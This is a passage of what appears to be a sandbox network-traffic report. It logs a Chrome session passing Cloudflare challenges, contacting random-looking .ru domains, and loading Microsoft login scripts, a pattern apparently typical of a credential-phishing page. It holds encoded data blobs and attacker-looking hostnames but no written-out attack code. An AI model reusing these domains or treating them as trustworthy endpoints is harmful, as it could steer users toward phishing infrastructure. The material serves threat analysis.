                                                                                                                  2024-12-19 10:43:14 UTC1306OUTData Raw: 7a 2d 73 43 73 67 68 59 50 35 5a 6b 48 56 58 4e 76 66 71 78 6f 67 72 78 58 32 76 4b 63 70 55 6a 55 6a 30 58 4c 4c 7a 4e 52 47 55 33 6b 39 41 51 44 4a 75 50 49 53 31 30 67 52 6e 38 34 30 38 49 51 4c 6b 73 48 64 6b 54 6b 35 6e 79 4a 37 46 5a 43 2b 47 32 4c 70 34 59 72 63 39 6b 34 6b 32 6b 62 49 4c 66 73 41 35 34 73 59 2b 6b 76 5a 78 76 4e 2d 59 5a 43 61 62 59 2d 78 72 68 37 6c 24 38 35 5a 6b 78 68 77 33 6b 24 48 55 54 4c 2b 6b 4f 64 4f 78 51 73 77 4c 48 6d 6a 58 38 35 4a 73 57 66 6b 4f 54 62 73 4d 2b 34 30 6b 4a 73 44 73 6b 71 50 7a 69 36 70 79 69 78 24 30 2d 48 49 4f 4f 50 38 75 30 59 56 45 57 50 2d 6c 79 6f 65 33 30 30 41 6d 78 6b 58 73 63 35 7a 24 6b 76 36 76 55 67 2b 4b 6b 62 4e 79 6b 72 6b 4a 75 35 34 42 56 6b 33 30 59 6b 58 64 36 55 72 6b 64 55 6f 65
                                                                                                                  Data Ascii: z-sCsghYP5ZkHVXNvfqxogrxX2vKcpUjUj0XLLzNRGU3k9AQDJuPIS10gRn8408IQLksHdkTk5nyJ7FZC+G2Lp4Yrc9k4k2kbILfsA54sY+kvZxvN-YZCabY-xrh7l$85Zkxhw3k$HUTL+kOdOxQswLHmjX85JsWfkOTbsM+40kJsDskqPzi6pyix$0-HIOOP8u0YVEWP-lyoe300AmxkXsc5z$kv6vUg+KkbNykrkJu54BVk30YkXd6UrkdUoe
                                                                                                                  2024-12-19 10:43:15 UTC286INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 4472
                                                                                                                  Connection: close
                                                                                                                  cf-chl-out: ebTq8guYxKzCT34c8v0KB/e4m/OsyzIvA8SbZgAi5CZqoSK3IRKwj/YExRuIMjXnDFGx8ExCkFqUY3gyKWDdfCyw9UWlBMMVPGkuL8+bWWlQLgVmgvkR6G0=$UZnP9ZjEUxwOr2Hj
                                                                                                                  2024-12-19 10:43:15 UTC1343INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 42 65 39 38 64 75 31 4a 44 39 53 38 7a 73 57 4c 49 72 66 2f 49 78 2b 56 35 54 74 67 31 56 30 41 76 39 30 46 70 36 6c 78 56 56 2f 4f 34 50 35 68 73 6a 6d 33 62 73 74 5a 39 2f 77 2f 31 73 51 73 48 6b 6b 67 67 6e 4d 52 7a 78 45 53 54 4b 43 73 31 2f 62 6d 47 7a 4a 52 33 61 61 30 6b 31 51 62 4e 56 71 62 51 65 34 32 4a 47 37 56 52 34 78 32 2f 76 35 33 57 53 76 55 50 70 68 71 64 31 46 4e 44 53 54 42 7a 37 79 4b 55 66 71 42 76 2f 5a 59 4b 34 42 4f 4f 75 49 37 74 72 62 6e 64 67 2b 63 35 34 34 45 6e 47 4a 47 66 30 2f 61 73 2b 77 48 61 33 2b 76 6b 36 63 39 55 78 43 43 32 41 56 67 4c 4e 32 4b 45 77 63 2f 50 4d 55 4c 53 72 71 59 63 79 75 72 61 49 45 65 6a 66 43 30 57 79 6c 31 38 6b 75 35 36 6a 46 6f 66 4c 66 4e 6a 6a 6e 62 53
                                                                                                                  Data Ascii: cf-chl-out-s: Be98du1JD9S8zsWLIrf/Ix+V5Ttg1V0Av90Fp6lxVV/O4P5hsjm3bstZ9/w/1sQsHkkggnMRzxESTKCs1/bmGzJR3aa0k1QbNVqbQe42JG7VR4x2/v53WSvUPphqd1FNDSTBz7yKUfqBv/ZYK4BOOuI7trbndg+c544EnGJGf0/as+wHa3+vk6c9UxCC2AVgLN2KEwc/PMULSrqYcyuraIEejfC0Wyl18ku56jFofLfNjjnbS
                                                                                                                  2024-12-19 10:43:15 UTC1109INData Raw: 77 37 75 56 79 62 54 43 77 59 57 2b 78 39 4b 63 77 4d 4c 48 71 73 57 75 6d 4a 4b 6b 6b 37 47 56 71 64 36 72 6d 75 4c 61 77 64 79 79 32 4b 48 4a 76 64 62 64 72 75 72 52 7a 63 7a 44 34 75 75 77 78 2b 62 76 73 72 76 47 75 50 72 4c 79 66 4c 58 30 4e 50 68 76 73 54 30 34 65 76 45 2b 50 73 47 43 39 45 43 44 68 62 53 38 4e 48 71 34 64 48 30 36 52 7a 62 47 76 73 53 2b 74 77 64 42 74 38 64 49 53 45 66 43 77 44 36 4c 53 49 46 4b 69 63 54 4c 51 59 6e 45 79 72 31 4a 78 45 30 2b 69 30 36 48 30 49 62 51 7a 34 57 41 44 39 42 47 50 77 72 52 54 5a 44 4f 55 51 7a 50 55 34 7a 52 69 38 53 54 42 64 44 4f 30 35 57 54 6b 74 4c 50 6c 70 57 58 6c 31 6f 56 6c 56 63 57 6b 64 4a 4f 6c 42 46 61 56 4e 44 50 30 39 43 63 6e 4a 69 65 55 35 53 53 47 59 78 57 54 6c 4c 50 56 4e 36 59 32 65
                                                                                                                  Data Ascii: w7uVybTCwYW+x9KcwMLHqsWumJKkk7GVqd6rmuLawdyy2KHJvdbdrurRzczD4uuwx+bvsrvGuPrLyfLX0NPhvsT04evE+PsGC9ECDhbS8NHq4dH06RzbGvsS+twdBt8dISEfCwD6LSIFKicTLQYnEyr1JxE0+i06H0IbQz4WAD9BGPwrRTZDOUQzPU4zRi8STBdDO05WTktLPlpWXl1oVlVcWkdJOlBFaVNDP09CcnJieU5SSGYxWTlLPVN6Y2e
                                                                                                                  2024-12-19 10:43:15 UTC1369INData Raw: 41 6f 47 7a 4e 63 4e 44 4d 4d 4f 7a 74 49 43 7a 63 2f 72 42 4f 6f 5a 47 4f 76 5a 33 41 7a 59 38 69 48 33 39 50 76 65 4a 50 58 36 4b 79 59 76 42 53 73 76 43 4f 6a 71 44 51 45 69 37 76 67 4a 47 7a 77 51 46 52 34 38 50 77 30 61 2b 7a 34 45 42 55 6b 48 52 79 4a 4d 49 6a 34 46 54 51 39 44 51 45 38 55 4a 54 45 67 55 30 4d 77 57 68 31 4c 54 31 30 32 56 69 4e 67 59 42 78 43 5a 46 49 39 56 79 56 57 54 6a 35 70 62 54 77 71 62 6a 56 75 4c 33 52 50 5a 6a 55 32 64 6d 34 78 4f 48 39 4f 54 44 78 2b 58 58 4a 42 64 32 4a 62 53 58 69 47 69 6b 70 6b 62 58 53 4f 52 32 6d 4a 54 6c 68 51 61 35 64 6c 64 59 65 61 6e 57 31 2f 6f 4a 39 78 6d 36 52 78 68 59 43 6f 61 36 70 75 61 5a 31 39 66 61 2b 4b 6a 61 61 79 70 4c 4a 37 68 58 32 32 66 48 75 71 72 37 47 2f 6d 70 79 42 66 6f 65 6d
                                                                                                                  Data Ascii: AoGzNcNDMMOztICzc/rBOoZGOvZ3AzY8iH39PveJPX6KyYvBSsvCOjqDQEi7vgJGzwQFR48Pw0a+z4EBUkHRyJMIj4FTQ9DQE8UJTEgU0MwWh1LT102ViNgYBxCZFI9VyVWTj5pbTwqbjVuL3RPZjU2dm4xOH9OTDx+XXJBd2JbSXiGikpkbXSOR2mJTlhQa5dldYeanW1/oJ9xm6RxhYCoa6puaZ19fa+KjaaypLJ7hX22fHuqr7G/mpyBfoem
                                                                                                                  2024-12-19 10:43:15 UTC1369INData Raw: 66 4d 45 67 48 2b 41 73 30 51 35 67 33 36 31 68 38 50 38 39 67 69 44 78 54 77 31 2f 73 58 42 4f 63 46 34 2f 34 65 4d 4f 34 77 48 42 44 38 35 67 34 32 43 51 4c 72 2b 54 49 36 46 52 77 50 4c 7a 4d 61 4e 78 56 45 2f 42 49 79 51 6b 4a 4b 4e 69 59 6c 48 54 73 75 4a 78 35 56 4e 53 31 55 49 68 42 63 4c 7a 49 65 55 53 74 59 59 78 38 39 4c 31 59 6a 59 6a 73 6b 4f 6d 68 41 56 6d 31 73 4d 47 6f 74 4d 6a 4e 71 4c 6e 51 33 52 48 6c 33 4f 6a 73 33 65 7a 4e 5a 65 58 70 34 67 59 53 4a 59 32 70 54 52 45 68 67 65 57 74 37 59 35 4b 55 5a 6f 79 53 62 6d 53 5a 63 6e 52 6f 69 59 35 31 6f 6e 71 69 65 46 78 2f 68 6e 31 35 6e 4b 4a 72 61 6d 64 76 68 34 68 39 67 70 57 78 6c 49 2b 32 67 35 61 71 6a 4c 79 73 73 5a 4c 41 77 4c 79 43 78 49 2b 64 76 73 65 64 78 71 61 61 6f 71 6d 59 71
                                                                                                                  Data Ascii: fMEgH+As0Q5g361h8P89giDxTw1/sXBOcF4/4eMO4wHBD85g42CQLr+TI6FRwPLzMaNxVE/BIyQkJKNiYlHTsuJx5VNS1UIhBcLzIeUStYYx89L1YjYjskOmhAVm1sMGotMjNqLnQ3RHl3Ojs3ezNZeXp4gYSJY2pTREhgeWt7Y5KUZoySbmSZcnRoiY51onqieFx/hn15nKJramdvh4h9gpWxlI+2g5aqjLyssZLAwLyCxI+dvsedxqaaoqmYq
                                                                                                                  2024-12-19 10:43:15 UTC625INData Raw: 57 38 42 45 64 33 41 7a 70 32 68 2f 37 33 78 37 6a 46 78 76 76 45 75 4d 43 4b 68 6b 69 35 53 38 74 45 67 4c 73 48 68 54 79 4e 4f 6f 6e 4d 76 66 38 46 50 6e 38 46 66 73 54 2b 69 34 33 46 55 49 48 4b 52 5a 4a 4f 7a 67 62 47 68 6b 74 53 51 73 2f 4c 69 46 59 4c 6a 51 61 46 6b 63 35 53 68 77 67 50 53 4d 62 58 30 39 50 48 69 68 62 4e 57 56 6d 50 54 6b 6d 62 32 4e 43 63 55 74 6a 56 6e 52 4d 63 30 4e 34 55 31 52 37 4f 56 61 41 54 6f 42 75 4f 49 64 42 68 45 56 55 56 45 74 64 63 45 5a 50 6b 6c 43 56 66 33 47 4f 6c 47 78 51 64 31 53 62 69 35 4f 62 61 5a 4b 67 6f 71 4b 6a 66 6c 39 6d 5a 4a 31 6f 6d 35 68 2b 61 47 2b 47 65 33 43 75 73 6e 4a 76 61 36 64 34 65 5a 52 39 6a 72 2b 2f 6b 48 36 2f 6d 72 4f 56 79 63 54 4c 72 49 69 67 6f 4d 72 4c 76 4a 44 45 6a 61 79 54 6b 64
                                                                                                                  Data Ascii: W8BEd3Azp2h/73x7jFxvvEuMCKhki5S8tEgLsHhTyNOonMvf8FPn8FfsT+i43FUIHKRZJOzgbGhktSQs/LiFYLjQaFkc5ShwgPSMbX09PHihbNWVmPTkmb2NCcUtjVnRMc0N4U1R7OVaAToBuOIdBhEVUVEtdcEZPklCVf3GOlGxQd1Sbi5ObaZKgoqKjfl9mZJ1om5h+aG+Ge3CusnJva6d4eZR9jr+/kH6/mrOVycTLrIigoMrLvJDEjayTkd


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.1649741104.18.95.414436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:16 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1718986187:1734603138:-fuB_9i_IyGwMpgw4KoVOm2lwYp9o5GhGCFPndHyn94/8f46c9ee5ddec342/e4jgsEtzF8zS5O9Prw1FFzFVATU.c4HRwGt6tabItaY-1734604976-1.1.1.1-SBt7hdxj6oQKcNR43FPZOZS6J2uULEN0KrtHmHgHyichxkNPYU63fWdC1DfmYnWv HTTP/1.1
                                                                                                                  Host: challenges.cloudflare.com
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:17 UTC379INHTTP/1.1 404 Not Found
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:17 GMT
                                                                                                                  Content-Type: application/json
                                                                                                                  Content-Length: 7
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                  cf-chl-out: tG95QSdc9lfbiIiJPEllIbEZt0sNKDZYM2U=$2pypJPnpI161V2pH
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca6f79ab7c6c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  2024-12-19 10:43:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                  Data Ascii: invalid


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.1649743104.21.32.2514436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:18 UTC675OUTGET /rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJI HTTP/1.1
                                                                                                                  Host: bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Origin: https://tt6l.xentore.ru
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Referer: https://tt6l.xentore.ru/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:19 UTC898INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3viRuhRhgE90dWvBVzjyTdCv7pfMvEk7sF2GUFBubzJgeAZd%2Ft3tAOw%2Frmnw60u0BVo8bk1cd7mQ%2BslfNuSXpAXQqEkHJZGT9iCrMdU3u2FSOHnZTErN6Rg4IPlp6JGA%2BLjjvRTxz3ezQiGnzTvfMD7Z3jrTk7%2FnSjAYWm40uDaafqto0fhh%2F%2BRYMnt6mJe%2FsXBEhgE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca7a1e4e41ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2408&min_rtt=2387&rtt_var=910&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1253&delivery_rate=1223292&cwnd=189&unsent_bytes=0&cid=1cd388fc21e16201&ts=862&x=0"
                                                                                                                  2024-12-19 10:43:19 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                  Data Ascii: 11
                                                                                                                  2024-12-19 10:43:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.1649746104.21.32.2514436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:21 UTC471OUTGET /rifemmklbecuphbjrjeRTfCOGHZFAYPELGXUEIIXJOALOEESXDWBBXBXNQOZYWLKJDTFOBXSCLPRJQOJI HTTP/1.1
                                                                                                                  Host: bhksek6wvvvwbimyy5laubfcyybljagnzmidmiz0qxgan2jerxhfwo.ezmbsgzm.ru
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:22 UTC891INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FxjjSSErjyRXOI0vezLRXxG1VSu1uKvZPSnKHi66PMtsysFs8W%2FmvENC3kpvtHpIxjwyJGA3IbsD85nNnoHl%2BNxWMX1VgDSsySHZvnnv4EVbG9bu%2FcDkIGMdmJsKFz86%2ByzZDki7xMlV66IdLOQOJGeIHssxQzgwHjtOk2PY0pN9C0mcuVqXtmZdzIF8xeAUsagmiOs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f46ca8f9fd319aa-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1783&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1049&delivery_rate=1612368&cwnd=32&unsent_bytes=0&cid=5d3aeadcf074f5de&ts=870&x=0"
                                                                                                                  2024-12-19 10:43:22 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                  Data Ascii: 11
                                                                                                                  2024-12-19 10:43:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.1649750152.199.21.1754436456C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-19 10:43:28 UTC635OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                                  Host: aadcdn.msftauth.net
                                                                                                                  Connection: keep-alive
                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                  Origin: https://login.microsoftonline.com
                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                  Referer: https://login.microsoftonline.com/
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-12-19 10:43:29 UTC750INHTTP/1.1 200 OK
                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                  Age: 6685234
                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                  Content-MD5: m5bMCfnonQM0ui+8IrUZeg==
                                                                                                                  Content-Type: application/x-javascript
                                                                                                                  Date: Thu, 19 Dec 2024 10:43:28 GMT
                                                                                                                  Etag: 0x8DCE31CBE97473C
                                                                                                                  Last-Modified: Wed, 02 Oct 2024 19:59:37 GMT
                                                                                                                  Server: ECAcc (lhc/78AB)
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  X-Cache: HIT
                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                  x-ms-request-id: fb7c97c3-801e-0062-1535-154340000000
                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                  Content-Length: 142367
                                                                                                                  Connection: close
                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                  Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 29 29 7d 66 6f 72 28 76 61 72 20 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 6f 5d 2e 73 70 6c 69 74 28 22 2c 22 29 2e 6d 61 70 28 4e 75 6d 62 65 72 29 2c 61 3d 69 5b 30 5d 2c 73 3d 69 5b 31 5d 2c 75 3d 69 5b 32 5d 3b 69 66 28 72 28 65 2c 61 2c 73 2c 75 29 29 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 21 6c 2e 66 69 72 73 74 28 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 3d 3d 65 2e 74 72 69 6d 28 29 7d 29 29 7d 69 66 28 5f 2e 69 73 48 69 67 68 43 6f 6e 74 72 61 73 74 28 29 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2c 6e 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 74
                                                                                                                  Data Ascii: ))}for(var o=0;o<t.length;o++){var i=t[o].split(",").map(Number),a=i[0],s=i[1],u=i[2];if(r(e,a,s,u))return!0}return!!l.first(n,(function(t){return t===e.trim()}))}if(_.isHighContrast()){var t=document.getElementsByTagName("body")[0],n=_.getComputedStyle(t
                                                                                                                  2024-12-19 10:43:29 UTC2INData Raw: 50 50
                                                                                                                  Data Ascii: PP
                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 5f 45 5f 4e 41 4d 45 5f 54 4f 4f 5f 53 48 4f 52 54 3a 22 38 30 30 34 31 31 30 31 22 2c 50 50 5f 45 5f 4e 41 4d 45 5f 49 4e 56 41 4c 49 44 3a 22 38 30 30 34 31 31 30 33 22 2c 50 50 5f 45 5f 49 4e 56 41 4c 49 44 41 52 47 3a 22 38 30 30 34 38 33 38 38 22 2c 50 50 5f 45 5f 53 41 5f 54 4f 4f 53 48 4f 52 54 3a 22 38 30 30 34 31 31 32 30 22 2c 50 50 5f 45 5f 53 41 5f 54 4f 4f 4c 4f 4e 47 3a 22 38 30 30 34 31 31 32 31 22 2c 50 50 5f 45 5f 49 4e 56 41 4c 49 44 5f 50 48 4f 4e 45 4e 55 4d 42 45 52 3a 22 38 30 30 34 31 31 33 46 22 2c 50 50 5f 45 5f 53 45 43 52 45 54 51 5f 43 4f 4e 54 41 49 4e 53 5f 53 45 43 52 45 54 41 3a 22 38 30 30 34 31 31 36 35 22 2c 50 50 5f 45 5f 53 45 43 52 45 54 41 5f 43 4f 4e 54 41 49 4e 53 5f 53 45 43 52 45 54 51 3a 22 38 30 30 34 31 31 37
                                                                                                                  Data Ascii: _E_NAME_TOO_SHORT:"80041101",PP_E_NAME_INVALID:"80041103",PP_E_INVALIDARG:"80048388",PP_E_SA_TOOSHORT:"80041120",PP_E_SA_TOOLONG:"80041121",PP_E_INVALID_PHONENUMBER:"8004113F",PP_E_SECRETQ_CONTAINS_SECRETA:"80041165",PP_E_SECRETA_CONTAINS_SECRETQ:"8004117
                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 55 49 45 76 65 6e 74 73 22 5d 3d 5b 22 6b 65 79 75 70 22 2c 22 6b 65 79 64 6f 77 6e 22 2c 22 6b 65 79 70 72 65 73 73 22 5d 2c 70 2e 4d 6f 75 73 65 45 76 65 6e 74 73 3d 22 63 6c 69 63 6b 20 64 62 6c 63 6c 69 63 6b 20 6d 6f 75 73 65 64 6f 77 6e 20 6d 6f 75 73 65 75 70 20 6d 6f 75 73 65 6d 6f 76 65 20 6d 6f 75 73 65 6f 76 65 72 20 6d 6f 75 73 65 6f 75 74 20 6d 6f 75 73 65 65 6e 74 65 72 20 6d 6f 75 73 65 6c 65 61 76 65 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 65 28 70 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 2e 6c 65 6e 67 74 68 29 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 74 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 68 5b 74 5b 6e 5d 5d 3d 65 7d 29 29 3b 76 61 72 20 67 2c 6d 3d 7b 70 72 6f 70 65 72 74 79 63 68 61 6e 67 65 3a 21 30 7d
                                                                                                                  Data Ascii: UIEvents"]=["keyup","keydown","keypress"],p.MouseEvents="click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave".split(" "),e(p,(function(e,t){if(t.length)for(var n=0,r=t.length;n<r;n++)h[t[n]]=e}));var g,m={propertychange:!0}
                                                                                                                  2024-12-19 10:43:29 UTC16383INData Raw: 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 20 6e 2e 6f 7d 7d 7d 28 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 22 2c 53 2e 53 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 67 65 74 44 65 70 65 6e 64 65 6e 63 69 65 73 43 6f 75 6e 74 22 2c 53 2e 53 2e 71 61 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 67 65 74 44 65 70 65 6e 64 65 6e 63 69 65 73 22 2c 53 2e 53 2e 56 61 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 69 73 49 6e 69 74 69 61 6c 22 2c 53 2e 53 2e 59 61 29 2c 53 2e 62 28 22 63 6f 6d 70 75 74 65 64 43 6f 6e 74 65 78 74 2e 72 65 67 69 73 74 65 72 44 65 70 65 6e 64 65 6e 63 79 22 2c 53 2e 53 2e 63 63 29 2c 53 2e 62 28 22 69 67 6e
                                                                                                                  Data Ascii: o:function(){if(n)return n.o}}}(),S.b("computedContext",S.S),S.b("computedContext.getDependenciesCount",S.S.qa),S.b("computedContext.getDependencies",S.S.Va),S.b("computedContext.isInitial",S.S.Ya),S.b("computedContext.registerDependency",S.S.cc),S.b("ign
                                                                                                                  2024-12-19 10:43:29 UTC3INData Raw: 53 2e 6d
                                                                                                                  Data Ascii: S.m
